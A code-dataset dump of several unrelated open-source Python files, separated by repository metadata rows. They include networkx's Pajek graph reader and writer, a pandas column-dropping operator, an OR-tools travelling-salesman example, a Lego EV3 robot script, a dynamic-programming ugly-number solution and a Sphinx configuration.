inp, bbox = self.transformation.test_transform(image, bbox)
return inp, torch.Tensor(bbox), torch.Tensor([det_res['bbox']]), torch.Tensor([det_res['image_id']]), torch.Tensor([det_res['score']]), torch.Tensor([imght]), torch.Tensor([imgwidth])
def __len__(self):
return len(self._det_json)
def write_coco_json(self, det_file):
from pycocotools.coco import COCO
import pathlib
_coco = COCO(self._ann_file)
image_ids = sorted(_coco.getImgIds())
det_model = get_detector(self._opt)
dets = []
for entry in tqdm(_coco.loadImgs(image_ids)):
abs_path = os.path.join(
self._root, self._img_prefix, entry['file_name'])
det = det_model.detect_one_img(abs_path)
if det:
dets += det
pathlib.Path(os.path.split(det_file)[0]).mkdir(parents=True, exist_ok=True)
json.dump(dets, open(det_file, 'w'))
@property
def joint_pairs(self):
"""Joint pairs which defines the pairs of joint to be swapped
when the image is flipped horizontally."""
return [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16],
[17, 20], [18, 21], [19, 22], [23, 39], [24, 38], [25, 37], [26, 36],
[27, 35], [28, 34], [29, 33], [30, 32], [40, 49], [41, 48], [42, 47],
[43, 46], [44, 45], [59, 68], [60, 67], [61, 66], [62, 65], [63, 70],
[64, 69], [54, 58], [55, 57], [71, 77], [72, 76], [73, 75], [84, 86],
[90, 88], [83, 87], [82, 78], [81, 79], [91, 112], [92, 113], [93, 114],
[94, 115], [95, 116], [96, 117], [97, 118], [98, 119], [99, 120],
[100, 121], [101, 122], [102, 123], [103, 124], [104, 125], [105, 126],
[106, 127], [107, 128], [108, 129], [109, 130], [110, 131], [111, 132]]
| 40.173913
| 192
| 0.541991
|
4a0f10aebbd38b6bf719adbe5e4819aba98c4c05
| 8,489
|
py
|
Python
|
networkx/readwrite/pajek.py
|
tombeek111/networkx
|
0770b228e0aab5acf8842981947857fdf85205ab
|
[
"BSD-3-Clause"
] | 1
|
2019-12-03T14:58:04.000Z
|
2019-12-03T14:58:04.000Z
|
networkx/readwrite/pajek.py
|
tombeek111/networkx
|
0770b228e0aab5acf8842981947857fdf85205ab
|
[
"BSD-3-Clause"
] | 1
|
2019-12-19T16:49:00.000Z
|
2019-12-20T06:22:46.000Z
|
networkx/readwrite/pajek.py
|
tombeek111/networkx
|
0770b228e0aab5acf8842981947857fdf85205ab
|
[
"BSD-3-Clause"
] | 2
|
2020-02-13T10:33:34.000Z
|
2020-08-09T07:59:26.000Z
|
"""
*****
Pajek
*****
Read graphs in Pajek format.
This implementation handles directed and undirected graphs including
those with self loops and parallel edges.
Format
------
See http://vlado.fmf.uni-lj.si/pub/networks/pajek/doc/draweps.htm
for format information.
"""
import warnings
import networkx as nx
from networkx.utils import open_file
__all__ = ['read_pajek', 'parse_pajek', 'generate_pajek', 'write_pajek']
def generate_pajek(G):
"""Generate lines in Pajek graph format.
Parameters
----------
G : graph
A Networkx graph
References
----------
See http://vlado.fmf.uni-lj.si/pub/networks/pajek/doc/draweps.htm
for format information.
"""
if G.name == '':
name = 'NetworkX'
else:
name = G.name
# Apparently many Pajek format readers can't process this line
# So we'll leave it out for now.
# yield '*network %s'%name
# write nodes with attributes
yield '*vertices %s' % (G.order())
nodes = list(G)
# make dictionary mapping nodes to integers
nodenumber = dict(zip(nodes, range(1, len(nodes) + 1)))
for n in nodes:
# copy node attributes and pop mandatory attributes
# to avoid duplication.
na = G.nodes.get(n, {}).copy()
x = na.pop('x', 0.0)
y = na.pop('y', 0.0)
id = int(na.pop('id', nodenumber[n]))
nodenumber[n] = id
shape = na.pop('shape', 'ellipse')
s = ' '.join(map(make_qstr, (id, n, x, y, shape)))
# only optional attributes are left in na.
for k, v in na.items():
if isinstance(v, str) and v.strip() != '':
s += ' %s %s' % (make_qstr(k), make_qstr(v))
else:
warnings.warn('Node attribute %s is not processed. %s.' %
(k,
'Empty attribute' if isinstance(v, str) else
'Non-string attribute'))
yield s
# write edges with attributes
if G.is_directed():
yield '*arcs'
else:
yield '*edges'
for u, v, edgedata in G.edges(data=True):
d = edgedata.copy()
value = d.pop('weight', 1.0) # use 1 as default edge value
s = ' '.join(map(make_qstr, (nodenumber[u], nodenumber[v], value)))
for k, v in d.items():
if isinstance(v, str) and v.strip() != '':
s += ' %s %s' % (make_qstr(k), make_qstr(v))
else:
warnings.warn('Edge attribute %s is not processed. %s.' %
(k,
'Empty attribute' if isinstance(v, str) else
'Non-string attribute'))
yield s
@open_file(1, mode='wb')
def write_pajek(G, path, encoding='UTF-8'):
"""Write graph in Pajek format to path.
Parameters
----------
G : graph
A Networkx graph
path : file or string
File or filename to write.
Filenames ending in .gz or .bz2 will be compressed.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.write_pajek(G, "test.net")
Warnings
--------
Optional node attributes and edge attributes must be non-empty strings.
Otherwise it will not be written into the file. You will need to
convert those attributes to strings if you want to keep them.
References
----------
See http://vlado.fmf.uni-lj.si/pub/networks/pajek/doc/draweps.htm
for format information.
"""
for line in generate_pajek(G):
line += '\n'
path.write(line.encode(encoding))
@open_file(0, mode='rb')
def read_pajek(path, encoding='UTF-8'):
"""Read graph in Pajek format from path.
Parameters
----------
path : file or string
File or filename to write.
Filenames ending in .gz or .bz2 will be uncompressed.
Returns
-------
G : NetworkX MultiGraph or MultiDiGraph.
Examples
--------
>>> G = nx.path_graph(4)
>>> nx.write_pajek(G, "test.net")
>>> G = nx.read_pajek("test.net")
To create a Graph instead of a MultiGraph use
>>> G1 = nx.Graph(G)
References
----------
See http://vlado.fmf.uni-lj.si/pub/networks/pajek/doc/draweps.htm
for format information.
"""
lines = (line.decode(encoding) for line in path)
return parse_pajek(lines)
def parse_pajek(lines):
"""Parse Pajek format graph from string or iterable.
Parameters
----------
lines : string or iterable
Data in Pajek format.
Returns
-------
G : NetworkX graph
See Also
--------
read_pajek()
"""
import shlex
# multigraph=False
if isinstance(lines, str):
lines = iter(lines.split('\n'))
lines = iter([line.rstrip('\n') for line in lines])
G = nx.MultiDiGraph() # are multiedges allowed in Pajek? assume yes
labels = [] # in the order of the file, needed for matrix
while lines:
try:
l = next(lines)
except: # EOF
break
if l.lower().startswith("*network"):
try:
label, name = l.split(None, 1)
except ValueError:
# Line was not of the form: *network NAME
pass
else:
G.graph['name'] = name
elif l.lower().startswith("*vertices"):
nodelabels = {}
l, nnodes = l.split()
for i in range(int(nnodes)):
l = next(lines)
try:
splitline = [x.decode('utf-8') for x in
shlex.split(str(l).encode('utf-8'))]
except AttributeError:
splitline = shlex.split(str(l))
id, label = splitline[0:2]
labels.append(label)
G.add_node(label)
nodelabels[id] = label
G.nodes[label]['id'] = id
try:
x, y, shape = splitline[2:5]
G.nodes[label].update({'x': float(x),
'y': float(y),
'shape': shape})
except:
pass
extra_attr = zip(splitline[5::2], splitline[6::2])
G.nodes[label].update(extra_attr)
elif l.lower().startswith("*edges") or l.lower().startswith("*arcs"):
if l.lower().startswith("*edge"):
# switch from multidigraph to multigraph
G = nx.MultiGraph(G)
if l.lower().startswith("*arcs"):
# switch to directed with multiple arcs for each existing edge
G = G.to_directed()
for l in lines:
try:
splitline = [x.decode('utf-8') for x in
shlex.split(str(l).encode('utf-8'))]
except AttributeError:
splitline = shlex.split(str(l))
if len(splitline) < 2:
continue
ui, vi = splitline[0:2]
u = nodelabels.get(ui, ui)
v = nodelabels.get(vi, vi)
# parse the data attached to this edge and put in a dictionary
edge_data = {}
try:
# there should always be a single value on the edge?
w = splitline[2:3]
edge_data.update({'weight': float(w[0])})
except:
pass
# if there isn't, just assign a 1
# edge_data.update({'value':1})
extra_attr = zip(splitline[3::2], splitline[4::2])
edge_data.update(extra_attr)
# if G.has_edge(u,v):
# multigraph=True
G.add_edge(u, v, **edge_data)
elif l.lower().startswith("*matrix"):
G = nx.DiGraph(G)
adj_list = ((labels[row], labels[col], {'weight': int(data)})
for (row, line) in enumerate(lines)
for (col, data) in enumerate(line.split())
if int(data) != 0)
G.add_edges_from(adj_list)
return G
def make_qstr(t):
"""Returns the string representation of t.
Add outer double-quotes if the string has a space.
"""
if not isinstance(t, str):
t = str(t)
if " " in t:
t = r'"%s"' % t
return t
| 31.095238
| 78
| 0.508658
|
4a0f10c57ead0b675bc0aa1040d61a1377f7cc70
| 5,522
|
py
|
Python
|
solution/operators/sdi_pandas_0.0.30/content/files/vflow/subengines/com/sap/python36/operators/sdi_pandas/cleanse/drop_1valuecolumn/drop_1valuecolumns.py
|
thhapke/DI_Pandas
|
7a9108007459260a30ea7ee404a76b42861c81c5
|
[
"MIT"
] | 2
|
2020-01-02T19:54:46.000Z
|
2020-03-09T08:49:33.000Z
|
solution/operators/sdi_pandas_0.0.30/content/files/vflow/subengines/com/sap/python36/operators/sdi_pandas/cleanse/drop_1valuecolumn/drop_1valuecolumns.py
|
thhapke/DI_Pandas
|
7a9108007459260a30ea7ee404a76b42861c81c5
|
[
"MIT"
] | null | null | null |
solution/operators/sdi_pandas_0.0.30/content/files/vflow/subengines/com/sap/python36/operators/sdi_pandas/cleanse/drop_1valuecolumn/drop_1valuecolumns.py
|
thhapke/DI_Pandas
|
7a9108007459260a30ea7ee404a76b42861c81c5
|
[
"MIT"
] | 1
|
2020-03-28T22:53:16.000Z
|
2020-03-28T22:53:16.000Z
|
import os
import pandas as pd
import sdi_utils.gensolution as gs
import sdi_utils.set_logging as slog
import sdi_utils.tprogress as tp
import sdi_utils.textfield_parser as tfp
try:
api
except NameError:
class api:
class config:
## Meta data
tags = {'python36': '','sdi_utils':''} # tags that helps to select the appropriate container
operator_description = 'Drop Single Value Columns'
operator_description_long='Drops columns of DataFrame with only one unique value.'
version = "0.0.1" # for creating the manifest.json
add_readme = dict()
add_readme["References"] =""
config_params = dict()
## config paramter
debug_mode = True
config_params['debug_mode'] = {'title': 'Debug mode',
'description': 'Sending debug level information to log port',
'type': 'boolean'}
columns = 'All'
config_params['columns'] = {'title': 'Columns', 'description': 'Columns to check for 1 unique value', 'type': 'string'}
info_only = 'True'
config_params['info_only'] = {'title': 'Info only', 'description': 'Only check without data modification.', 'type': 'boolean'}
class Message:
def __init__(self,body = None,attributes = ""):
self.body = body
self.attributes = attributes
def send(port,msg) :
if isinstance(msg,api.Message) :
print('Port: ', port)
print('Attributes: ', msg.attributes)
print('Body: ', str(msg.body))
else :
print(str(msg))
return msg
def set_port_callback(port, callback) :
df = pd.DataFrame(
{'icol': [1, 1, 1, 1, 2], 'xcol2': ['A', 'A', 'B', 'B', 'C'], 'xcol3': ['A', 'A', 'C', 'D', 'E'],
'xcol4': ['a', 'A', 'b', 'a', 'c'],'xcol5': ['X', 'A', 'B', 'B', 'C']})
default_msg = api.Message(attributes={'format': 'csv', 'name': 'DF_name'}, body=df)
callback(default_msg)
def call(config,msg):
api.config = config
return process(msg)
def process(msg):
att_dict = dict()
att_dict['config'] = dict()
att_dict['operator'] = 'drop_1valuecolumns'
logger, log_stream = slog.set_logging(att_dict['operator'])
if api.config.debug_mode == True:
logger.setLevel('DEBUG')
time_monitor = tp.progress()
logger.debug('Start time: ' + time_monitor.get_start_time())
df = msg.body
prev_shape = df.shape
# Columns with 1 unique value
columns = tfp.read_list(api.config.columns,df.columns)
col1val_data = {'column': [], 'type': [], 'unique_vals': [], 'action': []}
for col in columns:
vals = df[col].unique()
if len(vals) == 1:
col1val_data['column'].append(col)
col1val_data['type'].append(str(df[col].dtype))
col1val_data['unique_vals'].append(vals)
col1val_data['action'].append('drop')
if not api.config.info_only:
df.drop(columns=[col], inplace=True)
logger.debug('End time: ' + time_monitor.elapsed_time())
att_dict['memory'] = df.memory_usage(deep=True).sum() / 1024 ** 2
att_dict['columns'] = str(list(df.columns))
att_dict['shape'] = df.shape
att_dict['id'] = str(id(df))
logger.debug('Columns: {}'.format(str(df.columns)))
logger.debug('Shape (#rows - #columns): {} - {}'.format(df.shape[0], df.shape[1]))
logger.debug('Memory: {} kB'.format(att_dict['memory']))
logger.debug('Dropped columns: {}'.format(prev_shape[1] - df.shape[1]))
logger.info('Dropped columns: {}'.format(prev_shape[1] - df.shape[1]))
return log_stream.getvalue(), api.Message(attributes={'name':'drop_duplicates','type':'DataFrame'},body=df),\
api.Message(attributes={'name':'transformation','type':'DataFrame'},body=pd.DataFrame(col1val_data))
inports = [{"name":"data","type":"message.DataFrame","description":"Input data"}]
outports = [{"name":"log","type":"string","description":"Logging"},\
{"name":"transformation","type":"message.DataFrame","description":"Transformation data"},\
{"name":"data","type":"message.DataFrame","description":"Output data"}]
def call_on_input(msg) :
log, data, transformation_data = process(msg)
api.send(outports[0]['name'], log)
api.send(outports[1]['name'], transformation_data)
api.send(outports[2]['name'], data)
api.set_port_callback(inports[0]['name'], call_on_input)
def main() :
print('Test: Default')
api.set_port_callback(inports[0]['name'], call_on_input)
print('Test: config')
config = api.config
config.columns = 'All'
config.info_only = False
df = pd.DataFrame(
{'icol': [1, 1, 1, 1, 1], 'xcol2': ['A', 'A', 'B', 'B', 'C'], 'xcol3': ['A', 'A', 'C', 'D', 'E'],
'xcol4': ['A', 'A', 'b', 'a', 'c'], 'xcol5': ['A', 'A', 'A', 'A', 'A']})
test_msg = api.Message(attributes={'name':'test1'},body =df)
log, data, trans = api.call(config,test_msg)
print('Attributes: ', data.attributes)
print('Body: ', str(data.body))
print('Attributes: ', trans.attributes)
print('Body: ', str(trans.body))
print('Logging: ')
print(log)
gs.gensolution(os.path.realpath(__file__), config, inports, outports,override_readme=True)
| 39.163121
| 138
| 0.576965
|
4a0f10d743a48909a1c04f779b9e1688cd8b1147
| 4,954
|
py
|
Python
|
examples/python/tsp.py
|
prezaei85/or-tools
|
8ae61b6feb64c6193b4706535f8d06ee6e4e7270
|
[
"Apache-2.0"
] | 3
|
2021-12-11T12:30:09.000Z
|
2021-12-30T09:49:45.000Z
|
examples/python/tsp.py
|
kamyu104/or-tools
|
8ae61b6feb64c6193b4706535f8d06ee6e4e7270
|
[
"Apache-2.0"
] | null | null | null |
examples/python/tsp.py
|
kamyu104/or-tools
|
8ae61b6feb64c6193b4706535f8d06ee6e4e7270
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2010-2017 Google
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Traveling Salesman Sample.
This is a sample using the routing library python wrapper to solve a
Traveling Salesman Problem.
The description of the problem can be found here:
http://en.wikipedia.org/wiki/Travelling_salesman_problem.
The optimization engine uses local search to improve solutions, first
solutions being generated using a cheapest addition heuristic.
Optionally one can randomly forbid a set of random connections between nodes
(forbidden arcs).
"""
import random
import argparse
from ortools.constraint_solver import pywrapcp
# You need to import routing_enums_pb2 after pywrapcp!
from ortools.constraint_solver import routing_enums_pb2
parser = argparse.ArgumentParser()
parser.add_argument('--tsp_size', default = 10, type = int,
help='Size of Traveling Salesman Problem instance.')
parser.add_argument('--tsp_use_random_matrix', default=True, type=bool,
help='Use random cost matrix.')
parser.add_argument('--tsp_random_forbidden_connections', default = 0,
type = int, help='Number of random forbidden connections.')
parser.add_argument('--tsp_random_seed', default = 0, type = int,
help = 'Random seed.')
parser.add_argument('--light_propagation', default = False,
type = bool, help = 'Use light propagation')
# Cost/distance functions.
def Distance(i, j):
"""Sample function."""
# Put your distance code here.
return i + j
class RandomMatrix(object):
"""Random matrix."""
def __init__(self, size, seed):
"""Initialize random matrix."""
rand = random.Random()
rand.seed(seed)
distance_max = 100
self.matrix = {}
for from_node in range(size):
self.matrix[from_node] = {}
for to_node in range(size):
if from_node == to_node:
self.matrix[from_node][to_node] = 0
else:
self.matrix[from_node][to_node] = rand.randrange(distance_max)
def Distance(self, from_node, to_node):
return self.matrix[from_node][to_node]
def main(args):
# Create routing model
if args.tsp_size > 0:
# TSP of size args.tsp_size
# Second argument = 1 to build a single tour (it's a TSP).
# Nodes are indexed from 0 to parser_tsp_size - 1, by default the start of
# the route is node 0.
routing = pywrapcp.RoutingModel(args.tsp_size, 1, 0)
search_parameters = pywrapcp.RoutingModel.DefaultSearchParameters()
# Setting first solution heuristic (cheapest addition).
search_parameters.first_solution_strategy = (
routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
# Setting the cost function.
# Put a callback to the distance accessor here. The callback takes two
# arguments (the from and to node inidices) and returns the distance between
# these nodes.
matrix = RandomMatrix(args.tsp_size, args.tsp_random_seed)
matrix_callback = matrix.Distance
if args.tsp_use_random_matrix:
routing.SetArcCostEvaluatorOfAllVehicles(matrix_callback)
else:
routing.SetArcCostEvaluatorOfAllVehicles(Distance)
# Forbid node connections (randomly).
rand = random.Random()
rand.seed(args.tsp_random_seed)
forbidden_connections = 0
while forbidden_connections < args.tsp_random_forbidden_connections:
from_node = rand.randrange(args.tsp_size - 1)
to_node = rand.randrange(args.tsp_size - 1) + 1
if routing.NextVar(from_node).Contains(to_node):
print('Forbidding connection ' + str(from_node) + ' -> ' + str(to_node))
routing.NextVar(from_node).RemoveValue(to_node)
forbidden_connections += 1
# Solve, returns a solution if any.
# assignment = routing.SolveWithParameters(search_parameters)
assignment = routing.Solve()
if assignment:
# Solution cost.
print(assignment.ObjectiveValue())
# Inspect solution.
# Only one route here; otherwise iterate from 0 to routing.vehicles() - 1
route_number = 0
node = routing.Start(route_number)
route = ''
while not routing.IsEnd(node):
route += str(node) + ' -> '
node = assignment.Value(routing.NextVar(node))
route += '0'
print(route)
else:
print('No solution found.')
else:
print('Specify an instance greater than 0.')
if __name__ == '__main__':
main(parser.parse_args())
| 36.426471
| 80
| 0.700646
|
4a0f12b1bca59554bd78e74460f1c1fb54337c0f
| 61
|
py
|
Python
|
Graph/Graph/blog/tests.py
|
MGijon/TheGraph.es
|
34fc54e8d14625eb033f7506f12a615e3078c98b
|
[
"MIT"
] | null | null | null |
Graph/Graph/blog/tests.py
|
MGijon/TheGraph.es
|
34fc54e8d14625eb033f7506f12a615e3078c98b
|
[
"MIT"
] | 30
|
2020-01-10T21:20:52.000Z
|
2022-03-12T00:25:41.000Z
|
Graph/Graph/blog/tests.py
|
MGijon/TheGraph.es
|
34fc54e8d14625eb033f7506f12a615e3078c98b
|
[
"MIT"
] | null | null | null |
"""Blog tests."""
# Django
from django.test import TestCase
| 12.2
| 32
| 0.704918
|
4a0f12e4ed7cbbd6a8a5275896e9870e61a4aae0
| 146
|
py
|
Python
|
huobi/constant/__init__.py
|
xujunhuii/huobi_Python
|
958df8b22ce774329c7e15a1ecf2f52eea5f6af8
|
[
"Apache-2.0"
] | null | null | null |
huobi/constant/__init__.py
|
xujunhuii/huobi_Python
|
958df8b22ce774329c7e15a1ecf2f52eea5f6af8
|
[
"Apache-2.0"
] | null | null | null |
huobi/constant/__init__.py
|
xujunhuii/huobi_Python
|
958df8b22ce774329c7e15a1ecf2f52eea5f6af8
|
[
"Apache-2.0"
] | null | null | null |
from huobi.constant.definition import *
from huobi.constant.result import *
from huobi.constant.system import *
from huobi.constant.test import *
| 29.2
| 39
| 0.808219
|
4a0f137446af2599aeb98c92a3ad09cf7ec3bd55
| 2,317
|
py
|
Python
|
magnum/tests/functional/api/v1/models/baypatch_model.py
|
mail2nsrajesh/magnum
|
2e7e5a77967028c961337177ce577eb936c3845c
|
[
"Apache-2.0"
] | null | null | null |
magnum/tests/functional/api/v1/models/baypatch_model.py
|
mail2nsrajesh/magnum
|
2e7e5a77967028c961337177ce577eb936c3845c
|
[
"Apache-2.0"
] | null | null | null |
magnum/tests/functional/api/v1/models/baypatch_model.py
|
mail2nsrajesh/magnum
|
2e7e5a77967028c961337177ce577eb936c3845c
|
[
"Apache-2.0"
] | 1
|
2020-09-09T14:35:08.000Z
|
2020-09-09T14:35:08.000Z
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from magnum.tests.functional.common import models
class BayPatchData(models.BaseModel):
"""Data that encapsulates baypatch attributes"""
pass
class BayPatchEntity(models.EntityModel):
"""Entity Model that represents a single instance of BayPatchData"""
ENTITY_NAME = 'baypatch'
MODEL_TYPE = BayPatchData
class BayPatchCollection(models.CollectionModel):
"""Collection Model that represents a list of BayPatchData objects"""
MODEL_TYPE = BayPatchData
COLLECTION_NAME = 'baypatchlist'
def to_json(self):
"""Converts BayPatchCollection to json
Retrieves list from COLLECTION_NAME attribute and converts each object
to dict, appending it to a list. Then converts the entire list to json
This is required due to COLLECTION_NAME holding a list of objects that
needed to be converted to dict individually
:returns: json object
"""
data = getattr(self, BayPatchCollection.COLLECTION_NAME)
collection = []
for d in data:
collection.append(d.to_dict())
return json.dumps(collection)
@classmethod
def from_dict(cls, data):
"""Converts dict to BayPatchData
Converts data dict to list of BayPatchData objects and stores it
in COLLECTION_NAME
Example of dict data:
[{
"path": "/name",
"value": "myname",
"op": "replace"
}]
:param data: dict of patch data
:returns: json object
"""
model = cls()
collection = []
for d in data:
collection.append(cls.MODEL_TYPE.from_dict(d))
setattr(model, cls.COLLECTION_NAME, collection)
return model
| 30.090909
| 79
| 0.667242
|
4a0f14554b46d464f95e7a64d1a1063eea95e280
| 661
|
py
|
Python
|
Codes/gracekoo/interview_33.py
|
ghoslation/algorithm
|
5708bf89e59a80cd0f50f2e6138f069b4f9bc96e
|
[
"Apache-2.0"
] | 256
|
2017-10-25T13:02:15.000Z
|
2022-02-25T13:47:59.000Z
|
Codes/gracekoo/interview_33.py
|
IYoreI/Algorithm
|
0addf0cda0ec9e3f46c480eeda3a8ecb64c94121
|
[
"Apache-2.0"
] | 56
|
2017-10-27T01:34:20.000Z
|
2022-03-01T00:20:55.000Z
|
Codes/gracekoo/interview_33.py
|
IYoreI/Algorithm
|
0addf0cda0ec9e3f46c480eeda3a8ecb64c94121
|
[
"Apache-2.0"
] | 83
|
2017-10-25T12:51:53.000Z
|
2022-02-15T08:27:03.000Z
|
# -*- coding: utf-8 -*-
# @Time: 2020/7/3 10:21
# @Author: GraceKoo
# @File: interview_33.py
# @Desc: https://leetcode-cn.com/problems/chou-shu-lcof/
class Solution:
def nthUglyNumber(self, n: int) -> int:
if n <= 0:
return 0
dp, a, b, c = [1] * n, 0, 0, 0
for i in range(1, n):
min_ugly = min(dp[a] * 2, dp[b] * 3, dp[c] * 5)
dp[i] = min_ugly
if min_ugly == dp[a] * 2:
a += 1
if min_ugly == dp[b] * 3:
b += 1
if min_ugly == dp[c] * 5:
c += 1
return dp[-1]
so = Solution()
print(so.nthUglyNumber(10))
| 24.481481
| 59
| 0.444781
|
4a0f15d5405b6d9f46b85e848a3241dc407faf16
| 1,288
|
py
|
Python
|
tracker/01-tank-and-leds.py
|
obo/lego
|
7c24ed157610ced2461c460ddb5276dfb2adaa72
|
[
"MIT"
] | null | null | null |
tracker/01-tank-and-leds.py
|
obo/lego
|
7c24ed157610ced2461c460ddb5276dfb2adaa72
|
[
"MIT"
] | null | null | null |
tracker/01-tank-and-leds.py
|
obo/lego
|
7c24ed157610ced2461c460ddb5276dfb2adaa72
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import logging
from TRACK3R import TRACK3RWithClaw
import threading
import signal
import ev3dev.ev3 as ev3
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)5s: %(message)s')
log = logging.getLogger(__name__)
log.info("Starting TRACK3RWithClaw")
def touch_leds(done):
"""
This is the second thread of execution. It will constantly poll the
touch button and change leds
"""
ts = ev3.TouchSensor()
while not done.is_set():
ev3.Leds.set_color(ev3.Leds.LEFT, (ev3.Leds.GREEN, ev3.Leds.RED)[ts.value()])
# The 'done' event will be used to signal the threads to stop:
done = threading.Event()
# We also need to catch SIGINT (keyboard interrup) and SIGTERM (termination
# signal from brickman) and exit gracefully:
def signal_handler(signal, frame):
done.set()
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
# Now that we have the worker functions defined, lets run those in separate
# threads.
head = threading.Thread(target=touch_leds, args=(done,))
head.start()
log.info("Started TRACK3RWithClaw")
ev3.Sound.speak("I'm ready!")
tracker = TRACK3RWithClaw()
tracker.main()
log.info("Exiting TRACK3RWithClaw")
done.set()
head.join()
| 25.254902
| 85
| 0.725932
|
4a0f16c7e008cde5441ab1c82f5d2550f089d555
| 8,195
|
py
|
Python
|
docs/conf.py
|
yliharma/django-maat
|
6aa0ee72bb21658513021506dfd0dde2ee9bd2f1
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
yliharma/django-maat
|
6aa0ee72bb21658513021506dfd0dde2ee9bd2f1
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
yliharma/django-maat
|
6aa0ee72bb21658513021506dfd0dde2ee9bd2f1
|
[
"MIT"
] | 1
|
2020-06-19T13:40:47.000Z
|
2020-06-19T13:40:47.000Z
|
# -*- coding: utf-8 -*-
#
# Django-maat documentation build configuration file, created by
# sphinx-quickstart on Wed Nov 5 11:53:38 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Django-maat'
copyright = u'2014, Germano Guerrini'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Django-maatdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'Django-maat.tex', u'Django-maat Documentation',
u'Germano Guerrini', 'manual'),
]
